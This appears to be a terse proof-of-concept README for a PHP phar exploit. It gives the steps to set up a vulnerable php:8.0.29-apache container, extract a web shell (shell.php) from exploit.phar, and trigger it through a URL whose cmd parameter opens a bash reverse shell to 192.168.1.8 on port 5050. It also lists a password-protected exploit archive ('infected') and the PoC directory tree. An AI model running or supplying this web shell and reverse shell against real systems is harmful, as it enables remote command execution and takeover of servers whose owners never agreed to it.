sudo docker run -it --rm -p 8080:80 php:8.0.29-apache bash
echo "phar.readonly = Off" >> /usr/local/etc/php/php.ini
http://localhost:8080/shell.php?cmd=bash -c 'bash -i >%26 /dev/tcp/192.168.1.8/5050 0>%261'
php -r "\$phar = new Phar('exploit.phar'); \$phar->extractTo('./', 'shell.php');"
exploit.zip
pass: infected
[4.0K] /data/pocs/ac47b8a41b885643451235d9b9b86c3f1c6dfd1c
├── [6.6K] exploit.phar
├── [ 368] exploit.zip
├── [ 782] index.php
└── [ 322] README.md
0 directories, 4 files